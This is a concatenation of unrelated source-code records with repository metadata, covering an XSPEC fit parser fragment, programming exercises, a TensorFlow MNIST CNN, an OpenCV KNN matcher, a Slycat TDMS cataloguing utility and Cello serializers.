if model_flag==True:
cmd=re.sub("\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)","\g<1> \g<2> \g<3> \g<4> \g<5> \g<6>",cmd).split(" ")
m=AllModels(model_num)
p=m(model_param_counter)
if "/" in cmd:
model_param_counter+=1
if model_param_counter>m.nParameters:
model_num+=1
model_param_counter=1
if model_num>AllData.nGroups:
model_flag=False
continue
elif "=" in cmd:
p.link="".join(cmd).replace("=","")
else:
p.values=map(float,[ z for z in cmd if not z==''])
model_param_counter+=1
if model_param_counter>m.nParameters:
model_num+=1
model_param_counter=1
if model_num>AllData.nGroups:
model_flag=False
else:
cmd=cmd.split(" ")
if cmd[0]=="statistic":
Fit.statMethod=cmd[1]
elif cmd[0]=="method":
Fit.method=cmd[1]
Fit.nIterations=int(cmd[2])
Fit.criticalDelta=float(cmd[3])
elif cmd[0]=="abund":
Xset.abund=cmd[1]
elif cmd[0]=="xsect":
Xset.xsect=cmd[1]
elif cmd[0]=="xset":
if cmd[1]=="delta":
Fit.delta=float(cmd[2])
elif cmd[0]=="systematic":
AllModels.systematic=float(cmd[1])
elif cmd[0]=="data":
AllData(" ".join(cmd[1:]))
elif cmd[0]=="ignore":
AllData.ignore(" ".join(cmd[1:]))
elif cmd[0]=="model":
model_flag=True
Model(" ".join(cmd[1:]))
elif cmd[0]=="newpar":
m=AllModels(1)
npmodel=m.nParameters #number of params in model
group=int(np.ceil((float(cmd[1]))/npmodel))
if not int(cmd[1])/npmodel==float(cmd[1])/npmodel:
param=int(cmd[1])-(int(cmd[1])/npmodel)*npmodel # int div so effectivly p-floor(p/npmodel)*npmodel
else:
param=npmodel
print group,param
m=AllModels(group)
p=m(param)
if "=" in cmd[2] :
p.link="".join(cmd[2:]).replace("=","")
else:
p.values=map(float,cmd[2:])
| [
"nocturnalastro@users.noreply.github.com"
] | nocturnalastro@users.noreply.github.com |
921edfd522099ada4d11a5a777e54f9d2dca360b | ff6248be9573caec94bea0fa2b1e4b6bf0aa682b | /StudentProblem/10.21.11.16/3/1569573269.py | 7413ac80608e26f988f405d4836f82d6a23f8641 | [] | no_license | LennartElbe/codeEvo | 0e41b1a7705204e934ef71a5a28c047366c10f71 | e89b329bc9edd37d5d9986f07ca8a63d50686882 | refs/heads/master | 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | import functools
import typing
import string
import random
import pytest
def leap(j: int) -> bool:
if j % 4 == 0 and (j % 100 == 0 and j % 400 != 0):
return False
elif j % 4 == 0 and (j % 100 == 0 or j % 400 != 0):
return True
else:
return False
######################################################################
## Lösung Teil 2 (Tests)
print(leap(2000))
print(leap(1660))
print(leap(1783))
print(leap(1800))
######################################################################
| [
"lenni.elbe@gmail.com"
] | lenni.elbe@gmail.com |
e68500422dcce2cd1da8991f72a686ab537ad639 | c87a2aa3752d51b2191e6d3fe09fd982b3d40f6d | /ABC105a.py | 815275dcc7669d23cc6e40f980ac6864c5bed261 | [] | no_license | kairyu33/atcoder | 54df0eea2f1c61f516ec2dbb4b62eeeb59903269 | 61f76826ebaaf2604bfa0ce016e3de52d0a10f39 | refs/heads/main | 2023-06-14T21:52:33.208802 | 2021-07-09T15:14:06 | 2021-07-09T15:14:06 | 376,199,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | def main():
n, k = map(int, input().split())
if (n % k == 0):
print(0)
else:
print(1)
if __name__ == '__main__':
main()
| [
"kairyu333@gmail.com"
] | kairyu333@gmail.com |
5e93c1c35118d3f32a43a70d453bab1653d00a3c | 1e9c4294652b0f4699d85516afd54fb5697b4800 | /python_exam/0803/mnist_cnn02.py | 13b66b9af78378cf5592a9f8e0ee4e3c7dc36b17 | [] | no_license | mgh3326/GyeonggiBigDataSpecialist | 89c9fbf01036b35efca509ed3f74b9784e44ed19 | 29192a66df0913c6d9b525436772c8fd51a013ac | refs/heads/master | 2023-04-06T07:09:09.057634 | 2019-06-20T23:35:33 | 2019-06-20T23:35:33 | 138,550,772 | 3 | 2 | null | 2023-03-24T22:43:06 | 2018-06-25T06:10:59 | Jupyter Notebook | UTF-8 | Python | false | false | 4,430 | py | # -*- coding: utf-8 -*-
"""
ml_day4 (2018.08.02)
"""
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('./MNIST_data', one_hot=True)
import tensorflow as tf
sess = tf.InteractiveSession()
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
sess.run(tf.global_variables_initializer())
y = tf.nn.softmax(tf.matmul(x,W) + b)
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
for i in range(1000):
batch = mnist.train.next_batch(50)
train_step.run(feed_dict={x: batch[0], y_: batch[1]})
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels}))
#### CNN
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
###########################################
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('./MNIST_data', one_hot=True)
import tensorflow as tf
sess = tf.InteractiveSession()
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
x_image = tf.reshape(x, [-1,28,28,1])
## 첫번째 합성곱 레이어
# W_conv1 = weight_variable([5, 5, 1, 32])
# b_conv1 = bias_variable([32])
W_conv1 = tf.Variable(tf.truncated_normal([5, 5, 1, 32], stddev=0.1))
b_conv1 = tf.Variable(tf.constant(0.1, shape=[32]))
# h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
# h_pool1 = max_pool_2x2(h_conv1)
conv2d01 = tf.nn.conv2d(x_image, W_conv1, strides=[1, 1, 1, 1], padding='SAME')
h_conv1 = tf.nn.relu(conv2d01 + b_conv1)
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
## 두번째 합성곱 레이어
# W_conv2 = weight_variable([5, 5, 32, 64])
# b_conv2 = bias_variable([64])
W_conv2 = tf.Variable(tf.truncated_normal([5, 5, 32, 64], stddev=0.1))
b_conv2 = tf.Variable(tf.constant(0.1, shape=[64]))
# h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
# h_pool2 = max_pool_2x2(h_conv2)
conv2d02 = tf.nn.conv2d(h_pool1, W_conv2, strides=[1, 1, 1, 1], padding='SAME')
h_conv2 = tf.nn.relu(conv2d02 + b_conv2)
h_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
## 완전 연결 계층
# W_fc1 = weight_variable([7 * 7 * 64, 1024])
# b_fc1 = bias_variable([1024])
W_fc1 = tf.Variable(tf.truncated_normal([7 * 7 * 64, 1024], stddev=0.1))
b_fc1 = tf.Variable(tf.constant(0.1, shape=[1024]))
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
## 드롭아웃
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
## 최종 소프트맥스
# W_fc2 = weight_variable([1024, 10])
# b_fc2 = bias_variable([10])
W_fc2 = tf.Variable(tf.truncated_normal([1024, 10], stddev=0.1))
b_fc2 = tf.Variable(tf.constant(0.1, shape=[10]))
y_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)
## 모델 훈련 및 평가
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_conv), reduction_indices=[1]))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
sess.run(tf.global_variables_initializer())
for i in range(20000):
batch = mnist.train.next_batch(50)
if i%100 == 0:
train_accuracy = accuracy.eval(feed_dict={
x:batch[0], y_: batch[1], keep_prob: 1.0})
print("step %d, training accuracy %g"%(i, train_accuracy))
train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
print("test accuracy %g"%accuracy.eval(feed_dict={
x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0})) | [
"mgh3326@naver.com"
] | mgh3326@naver.com |
206a46545ce7b3d6a02d574422bf55d6230e4d5b | 657a0e7550540657f97ac3f7563054eb4da93651 | /Boilermake2018/Lib/site-packages/twitter/__init__.py | c6e433f8e7a51315a4d2a247a08873855fb5ce5c | [
"LicenseRef-scancode-unknown-license-reference",
"CC0-1.0"
] | permissive | TejPatel98/voice_your_professional_email | faf4d2c104e12be61184638913ebe298893c5b37 | 9cc48f7bcd6576a6962711755e5d5d485832128c | refs/heads/master | 2022-10-15T03:48:27.767445 | 2019-04-03T16:56:55 | 2019-04-03T16:56:55 | 179,291,180 | 0 | 1 | CC0-1.0 | 2022-10-09T13:00:52 | 2019-04-03T13:01:50 | Python | UTF-8 | Python | false | false | 2,139 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2007-2018 The Python-Twitter Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library that provides a Python interface to the Twitter API."""
from __future__ import absolute_import
__author__ = 'The Python-Twitter Developers'
__email__ = 'python-twitter@googlegroups.com'
__copyright__ = 'Copyright (c) 2007-2016 The Python-Twitter Developers'
__license__ = 'Apache License 2.0'
__version__ = '3.4.2'
__url__ = 'https://github.com/bear/python-twitter'
__download_url__ = 'https://pypi.python.org/pypi/python-twitter'
__description__ = 'A Python wrapper around the Twitter API'
import json # noqa
try:
from hashlib import md5 # noqa
except ImportError:
from md5 import md5 # noqa
from ._file_cache import _FileCache # noqa
from .error import TwitterError # noqa
from .parse_tweet import ParseTweet # noqa
from .models import ( # noqa
Category, # noqa
DirectMessage, # noqa
Hashtag, # noqa
List, # noqa
Media, # noqa
Trend, # noqa
Url, # noqa
User, # noqa
UserStatus, # noqa
Status # noqa
)
from .api import Api # noqa
| [
"tpa244@uky.edu"
] | tpa244@uky.edu |
d920e855764cded63171a613b96a14801d525791 | 66932bac8dfdc4c107705e44294409fa1dd05f62 | /venv/bin/django-admin | 8f3f9f0a350610a30f5cdad40f7ccf0ef27a27d9 | [] | no_license | jatia/django | 6572d474738aade008930e7210ef0e4ca1c739be | 20a97ce78755fb65dd551cf92f8322316ab39984 | refs/heads/master | 2021-09-07T03:39:02.119441 | 2018-02-15T15:24:11 | 2018-02-15T15:24:11 | 117,251,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | #!/home/jatia/workspace/django/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from django.core.management import execute_from_command_line
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(execute_from_command_line())
| [
"julissa.atia@gmail.com"
] | julissa.atia@gmail.com | |
96e111c9b79508abc86ab994ca72482efa2082de | 0db3ffb5060fd0d4a7e1ee59ab1a5f6766f35c11 | /4_Feature matching/code/4.6_KNN.py | b286eeff295cbf5749c3387ee1b852e1e517719a | [] | no_license | maibobo/Learn-cv | c525b780f0ce61d0906525dd51902aeab1ba8d75 | 928c6dae9c12427d1ae6dab7837657b68098f935 | refs/heads/master | 2020-06-14T10:36:25.655934 | 2019-07-03T12:50:44 | 2019-07-03T12:50:44 | 194,983,444 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | # -*- coding:utf-8 -*-
import os
import cv2
import numpy as np
'''
使用KNN即K近邻算法进行特征匹配
ORB算法
'''
img1 = cv2.imread('orb1.jpg',0) #测试图像img1
# img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img2 = cv2.imread('orb2.jpg',0) ##训练图像img2
# img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
orb = cv2.ORB_create()
kp1, des1 = orb.detectAndCompute(img1, None)
kp2, des2 = orb.detectAndCompute(img2, None)
bf = cv2.BFMatcher(cv2.NORM_HAMMING,crossCheck = False)
#对每个匹配选择两个最佳的匹配
matches = bf.knnMatch(des1, des2, k=2)
print(type(matches), len(matches), matches[0])
# 获取img1中的第一个描述符即[0][]在img2中最匹配即[0][0]的一个描述符 距离最小
dMatch0 = matches[0][0]
# 获取img1中的第一个描述符在img2中次匹配的一个描述符 距离次之
dMatch1 = matches[0][1]
print('knnMatches', dMatch0.distance, dMatch0.queryIdx, dMatch0.trainIdx)
print('knnMatches', dMatch1.distance, dMatch1.queryIdx, dMatch1.trainIdx)
# 将不满足的最近邻的匹配之间距离比率大于设定的阈值匹配剔除。
img3 = None
img3 = cv2.drawMatchesKnn(img1, kp1, img2, kp2, matches, img3, flags=cv2.DRAW_MATCHES_FLAGS_DEFAULT)
img3 = cv2.resize(img3,(1000, 400))
cv2.imshow('KNN',img3)
cv2.waitKey()
cv2.destroyAllWindows()
| [
"42796626+maibobo@users.noreply.github.com"
] | 42796626+maibobo@users.noreply.github.com |
596fbd0f3ba50656e01ae10f54ce925cb0d45bc4 | 70a9b6201ed77235929f4561bfaf2baf20decd3e | /SelfStudy[Python]/Learn_Python/basics/changing_case_in_strings.py | 868b21704acd79a9f869cb7e466cb355c335b939 | [] | no_license | Troys-Code/Coding | 4cb4fce0a7e79dbdf18828e4d32974f58789098d | 5b8ee557e7fc2d1ee321c66ebedc596f72fa4bad | refs/heads/master | 2023-07-14T14:03:22.789272 | 2021-08-25T00:22:05 | 2021-08-25T00:22:05 | 343,971,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | name = "troy schultz"
print(name.title()) # Prints Each First Letter In The String As Capitals
print(name.upper()) # Prints With All Characters Lower Case
print(name.lower()) # Prints With All Characters Upper Case
# .lower() and .upper() are useful for user inputs to validate user input with less variations
# Troy tRoy trOy troY are all the same using these functions
# This makes it easy to not worry about the users capitalizations, so you would convert user inputs
# before storing them. Then when you want to display the information, you'll use whatever capitalization makes the most sense
# for each string
| [
"41653822+Troys-Code@users.noreply.github.com"
] | 41653822+Troys-Code@users.noreply.github.com |
3a5f62f6abb917dc1564d007536613a243d9b2b7 | 6e3dc22393206ffd334fe5510a11e7b914475ab9 | /tp1 Funciones/ej1.py | 72fd526e4e2fdcf03d442ee8ac2a33e8456ee0c0 | [] | no_license | Rodrigo00909/pythonfacultad1 | b9d3baf91818daf94bf7eb0a03f514e26a02953b | 39af8d9e9f285c0ce338e49edd7d2e2380e60c49 | refs/heads/main | 2023-02-26T08:01:32.664894 | 2021-02-05T00:55:07 | 2021-02-05T00:55:07 | 332,917,011 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,139 | py | # 1. Desarrollar una función que reciba tres números positivos y devuelva el mayor de
# los tres, sólo si éste es único (mayor estricto). En caso de no existir el mayor estricto devolver -1.
# No utilizar operadores lógicos (and, or, not). Desarrollar también un programa para ingresar los tres valores, invocar a la función y mostrar el
# máximo hallado, o un mensaje informativo si éste no existe.
# Maximo estricto = Que sea el mas grande y unico
# Ejecutar solo 1 programa
# Programa 1
def mayorPos(a,b,c):
if a > b:
if a > c:
return a
if b > a:
if b > c:
return b
if c > a:
if c > b:
return c
return -1
# Programa Principal
x = int(input("Ingrese un primer número: "))
y = int(input("Ingrese un segundo número: "))
z = int(input("Ingrese un tercer número: "))
if mayorPos == -1:
print("No existe un mayor estricto")
else:
print("El mayor es:",mayorPos(x,y,z))
# -----------------------------
# Programa 2
### Agregar la importancion de randint desde random
## Escribir un array que contenga los 3 numeros fecha. Recorrerlo agregandole la importacion random de randint, con rango de numeros 0 y 10
## Asignar los 3 numeros del array a algunas variables que luego seran trasladados como parametro a la funcion de mayor estricto.
## Agregar una validacion para que si el mayor es -1 entonces diga que no exista un mayor, en caso contrario que diga cual fue el mayor
from random import randint
def mayorEstr(a,b,c):
if a > b:
if a > c:
return a
if b > a:
if b > c:
return b
if c > a:
if c > b:
return c
return -1
def verificarFecha():
fechas = []
for i in range(3): # 3 xq son 3 numeros pos
fechas.append(randint(0,10))
a,b,c = fechas
mayorEstricto = mayorEstr(a,b,c)
print(fechas)
if mayorEstricto == -1:
print("No existe un mayor estricto")
else:
print(f"El mayor estricto es {mayorEstricto}")
# Programa Principal
verificarFecha() | [
"noreply@github.com"
] | noreply@github.com |
0f386418ae2dc0fc5c9218cff9565de3b2531ec0 | c8cfc8f3e3e1c0a4a856355ff90cceca3191ba77 | /web-client/slycat/web/client/dac_tdms_util.py | 136a011e4bb6fbd2c30e33ffa9eef052f01c2c29 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | sandialabs/slycat | 8fb41164c74a78f645ba3c4db6cb5e33e9b515c8 | 1af9aa38c7ffa5d3f02101cc057e5d2ff20897c0 | refs/heads/master | 2023-08-17T19:30:16.277591 | 2023-08-09T19:49:29 | 2023-08-09T19:49:29 | 11,371,048 | 69 | 24 | NOASSERTION | 2023-08-31T15:22:37 | 2013-07-12T14:50:39 | JavaScript | UTF-8 | Python | false | false | 11,283 | py | # Copyright (c) 2013, 2018 National Technology and Engineering Solutions of Sandia, LLC.
# Under the terms of Contract DE-NA0003525 with National Technology and Engineering
# Solutions of Sandia, LLC, the U.S. Government retains certain rights in this software.
# Module defining Dial-A-Cluster .tdms parser, options, and a utility for
# enumerating .tdms files.
# S. Martin
# 5/31/2023
# file manipulation
import os
import fnmatch
# arrays
import numpy as np
# TDMS error handling
class TDMSUploadError (Exception):
# exception for TDMS upload problems
def __init__(self, message):
self.message = message
# add tdms parser options for any dac model
def add_options(parser):
# parsing parameters
parser.add_argument("--min-time-points", default=10, type=int,
help="Minimum number of time points per channel, integer >= 2. " +
"Default: %(default)s.")
parser.add_argument("--min-channels", default=2, type=int,
help="Minimum number of channels per text, integer >= 1. " +
"Default: %(default)s.")
parser.add_argument("--min-num-shots", default=1, type=int,
help="Channels must occur in at least this many shots, integer >= 0. " +
"Use zero to indicate that channel must occur in every shot. " +
"Default: %(default)s.")
parser.add_argument("--num-landmarks", default=None, type=int,
help="Number of landmarks to use, integer >= 3. Can also use zero " +
"to indicate use of full dataset (no landmarks). Default: %(default)s.")
parser.add_argument("--num-PCA-comps", default=10, type=int,
help="Number of PCA components to use, integer >= 2. Note --num-landmarks " +
"over-rides --num-PCA-comps. Default: %(default)s.")
parser.add_argument("--overvoltage", action="store_true",
help="Expecting overvoltage data.")
parser.add_argument("--sprytron", action="store_true",
help="Expecting sprytron data.")
parser.add_argument("--intersection", action="store_true",
help="Combine mismatched time steps using intersection. " +
"Default is to combine using union.")
parser.add_argument("--do-not-infer-channel-units", action="store_true",
help="Do not infer channel units. Default is to infer channel units " +
"from channel name.")
parser.add_argument("--do-not-infer-time-units", action="store_true",
help="Do not infer time units. Default is to assume unspecified units " +
"are seconds.")
return parser
# parse tmds input parameters
def get_parms(arguments):
# set shot type
shot_type = 'General'
if arguments.overvoltage:
shot_type = 'Overvoltage'
if arguments.sprytron:
shot_type = 'Sprytron'
# set union type
union_type = "Union"
if arguments.intersection:
union_type = "Intersection"
# populate parameters
parser_parms = [arguments.min_time_points, arguments.min_channels,
arguments.min_num_shots, arguments.num_landmarks,
arguments.num_PCA_comps,
shot_type, union_type,
not arguments.do_not_infer_channel_units,
not arguments.do_not_infer_time_units]
return parser_parms
# check dac tdms parser parameters
def check_parms (arguments, parms):
check_parser_msg = []
# first parameter is minimum number of time points
if parms[0] < 2:
check_parser_msg.append ("Each channel must have at least two values. " + \
"Please use a larger value for min-time-points and try again.")
# second parameter is minimum number of channels
if parms[1] < 1:
check_parser_msg.append ("Each test must have at least one channel. " + \
"Please use a larger value for min-channels and try again.")
# third parameter is minimum number of shots
if parms[2] < 0:
check_parser_msg.append("Each channel must occur in at least one channel " + \
"(use 0 to indicate every channel). Please use a non-negative value " + \
"for min-num-shots and try again.")
# fourth parameter is number of landmarks
if parms[3] is not None:
if not (parms[3] == 0 or parms[3] >= 3):
check_parser_msg.append("Number of landmarks must be zero or >= 3. Please " + \
"provide a valid number of landmarks and try again.")
# fifth parameter is number of PCA components
if parms[4] < 2:
check_parser_msg.append("Number of PCA components must be >= 2. Please provide " + \
"a valid number of PCA components and try again.")
# sixth parameter is expected type
if parms[5] != "General" and \
parms[5] != "Overvoltage" and \
parms[5] != "Sprytron":
check_parser_msg.append ('Expected data type must be one of "General", ' + \
'"Overvoltage" or "Sprytron". Please use one of those options ' + \
'and try again.')
# seventh parameter is union or intersection (combination of time series)
if parms[6] != "Union" and \
parms[6] != "Intersection":
check_parser_msg.append ('Available methods for combining mismatched, ' + \
'time points are "Union" and "Intersection". Please use one of those options ' + \
'and try again.')
# seventh and eighth parameters are boolean, so either option is OK
# landmarks over-rides PCA comps, adjust parms
if arguments.num_landmarks is not None:
parms[4] = False
else:
parms[4] = True
parms[3] = arguments.num_PCA_comps
return parms, "\n".join(check_parser_msg)
# parse test data subdirectory
def parse_run_chart (run_chart):
# default return is None
run_chart_id = None
# split run_chart string on "_" to get identifiers
run_chart_id = run_chart.split("_")
# there should be four identifiers
if len(run_chart_id) != 4:
run_chart_id = None
return run_chart_id
# enumerate tdms files based on command line inputs
# TDMS_MATCHES gives a list of TDMS file type for filtering
def catalog_tdms_files (arguments, log, TDMS_MATCHES):
# gather data directories for given part number
root_dir = arguments.input_data_dir
part_num_match = arguments.part_num_match
# check that root dir exists
if not os.path.isdir(root_dir):
raise TDMSUploadError("Input data directory does not exist. Please provide " +
"a different directory and try again.")
# look for directories containing data for part number provided
root_subdirs = os.listdir(root_dir)
part_subdirs = fnmatch.filter(root_subdirs, part_num_match)
# are there any subdirectories?
if len(part_subdirs) == 0:
raise TDMSUploadError('Could not find any subdirectories for part number matching "' +
part_num_match + '".')
# put subdirectories in order
part_subdirs.sort()
# get list of .tdms file matches
tdms_matches = TDMS_MATCHES
if arguments.tdms_file_matches is not None:
tdms_matches = arguments.tdms_file_matches
tdms_matches = [file_match.replace('_', ' ') for file_match in tdms_matches]
# report on tdms file being used
log("Using .tdms file matches in: " + str(tdms_matches))
# look through each subdirectory for run chart data
metadata = []
for subdir in part_subdirs:
# look for test data directory
test_data_dir = os.path.join(root_dir, subdir, 'Test Data')
# skip if run_chart_dir is not an actual directory
if not os.path.isdir(test_data_dir):
log('Skipping "' + test_data_dir + '" because it''s not a directory.')
continue
# each of the subdirectories of run_chart_dir will be a row in the
# metadata table for the run chart model
possible_run_chart_dirs = os.listdir(test_data_dir)
# sort according to data ids
possible_run_chart_dirs.sort()
# check that we found data directories
if len(possible_run_chart_dirs) == 0:
raise TDMSUploadError('No data subdirectories found for part number match "' +
part_num_match + '".')
# check that data directories conform to expected format
for run_chart_dir in possible_run_chart_dirs:
# check that directory is expected format for a run chart
run_chart_ids = parse_run_chart(run_chart_dir)
# if it's not a run chart then skip it
if run_chart_ids is None:
log('Skipping run chart subdirectory "' + run_chart_dir +
'" because it does not conform to "part_lot_batch_serial" string format.')
continue
# find .tdms files in run chart directory
run_chart_files = os.listdir(os.path.join(test_data_dir, run_chart_dir))
run_chart_tdms_files = [run_chart_file for run_chart_file in run_chart_files
if run_chart_file.endswith('.tdms')]
# check that we have .tdms files
if len(run_chart_tdms_files) == 0:
log ('Skipping subdirectory "' + run_chart_ids[0] + '" -- does not ' +
'contain any TDMS files.')
continue
# screen for .tdms files according to argument parameters
run_chart_tdms_matches = []
run_chart_tdms_types = []
for run_chart_file in run_chart_tdms_files:
for match in tdms_matches:
if match in run_chart_file:
# check that .tdms file has matching part_lot_batch_sn
if not run_chart_file.startswith(
run_chart_ids[0] + "_" +
run_chart_ids[1] + "_" +
run_chart_ids[2] + "_" +
run_chart_ids[3]):
continue
# keep track of files and types
run_chart_tdms_types.append(match)
run_chart_tdms_matches.append(run_chart_file)
# check that we have matching .tdms files
if len(run_chart_tdms_matches) == 0:
log ('Skipping subdirectory "' + run_chart_ids[0] + '" -- does not ' +
'contain any TDMS files with file matches.')
continue
# store in metadata structure
metadata.append({"part": run_chart_ids[0],
"lot": run_chart_ids[1],
"batch": run_chart_ids[2],
"sn": run_chart_ids[3],
"source": os.path.join(os.path.abspath(test_data_dir),
run_chart_dir),
"tdms_files": run_chart_tdms_matches,
"tdms_types": run_chart_tdms_types})
# check that files were found
if metadata == []:
raise TDMSUploadError("No TDMS files matching selection criterion were found.")
return metadata
| [
"smartin@sandia.gov"
] | smartin@sandia.gov |
3c5b287ba292013072af0952810ed48c30cfb9e9 | 95341c85a8a116dba0d77644360ccfb346ceeb80 | /src/api-engine/api/routes/node/serializers.py | 9d954df567d1319bff4f28d77173fa89c21c0968 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | kuochunchang/cello | 109204905a6be17c47b6aa3268ee4bbfeadce43a | 1f778cea3a2021aabadd48e41cdd69ed1f8e979c | refs/heads/master | 2020-06-03T05:42:43.108481 | 2019-05-28T13:45:05 | 2019-05-28T13:45:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,661 | py | #
# SPDX-License-Identifier: Apache-2.0
#
import logging
from rest_framework import serializers
from api.common.enums import (
Operation,
NetworkType,
FabricNodeType,
FabricVersions,
HostType,
)
from api.common.serializers import PageQuerySerializer
from api.models import Node
LOG = logging.getLogger(__name__)
class NodeQuery(PageQuerySerializer, serializers.ModelSerializer):
agent_id = serializers.UUIDField(
help_text="Agent ID, only operator can use this field",
required=False,
allow_null=True,
)
class Meta:
model = Node
fields = (
"page",
"per_page",
"type",
"name",
"network_type",
"network_version",
"agent_id",
)
extra_kwargs = {"type": {"required": False}}
class NodeIDSerializer(serializers.Serializer):
id = serializers.UUIDField(help_text="ID of node")
class NodeInListSerializer(NodeIDSerializer, serializers.ModelSerializer):
agent_id = serializers.UUIDField(
help_text="Agent ID", required=False, allow_null=True
)
network_id = serializers.UUIDField(
help_text="Network ID", required=False, allow_null=True
)
class Meta:
model = Node
fields = (
"id",
"type",
"name",
"network_type",
"network_version",
"created_at",
"agent_id",
"network_id",
)
extra_kwargs = {
"id": {"required": True, "read_only": False},
"created_at": {"required": True, "read_only": False},
}
class NodeListSerializer(serializers.Serializer):
data = NodeInListSerializer(many=True, help_text="Nodes list")
total = serializers.IntegerField(
help_text="Total number of node", min_value=0
)
class NodeCreateBody(serializers.ModelSerializer):
agent_type = serializers.ChoiceField(
help_text="Agent type",
choices=HostType.to_choices(True),
required=False,
)
class Meta:
model = Node
fields = (
"network_type",
"network_version",
"type",
"agent_type",
"agent",
)
extra_kwargs = {
"network_type": {"required": True},
"network_version": {"required": True},
"type": {"required": True},
}
def validate(self, attrs):
network_type = attrs.get("network_type")
node_type = attrs.get("type")
network_version = attrs.get("network_version")
agent_type = attrs.get("agent_type")
agent = attrs.get("agent")
if network_type == NetworkType.Fabric.name.lower():
if network_version not in FabricVersions.values():
raise serializers.ValidationError("Not valid fabric version")
if node_type not in FabricNodeType.names():
raise serializers.ValidationError(
"Not valid node type for %s" % network_type
)
if agent_type is None and agent is None:
raise serializers.ValidationError("Please set agent_type or agent")
if agent_type and agent:
if agent_type != agent.type:
raise serializers.ValidationError(
"agent type not equal to agent"
)
return attrs
class NodeOperationSerializer(serializers.Serializer):
action = serializers.ChoiceField(
help_text=Operation.get_info("Operation for node:", list_str=True),
choices=Operation.to_choices(True),
)
| [
"hightall@me.com"
] | hightall@me.com |
26accc85bb295eeec34334972d717689820a06f2 | 1c822c0d49d7b67b0896c066958148a7b0731924 | /Basic_Concepts_of_String_Manipulation/First_day!.py | d6cff37297cfcb07407b916cacdfdf68deaf9adc | [
"MIT"
] | permissive | RKiddle/python_reg_expressions | 7e13a16475476c88543fde6dc55b53ec2fccbe37 | 9e89c1c59677ffa19a4c64a37e92bbea33fad88e | refs/heads/master | 2020-06-23T00:34:07.027628 | 2019-10-27T14:51:32 | 2019-10-27T14:51:32 | 198,446,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | # Find characters in movie variable
length_string = len(movie)
# Convert to string
to_string = str(length_string)
# Predefined variable
statement = "Number of characters in this review:"
# Concatenate strings and print result
print(statement + " " + to_string)
| [
"noreply@github.com"
] | noreply@github.com |
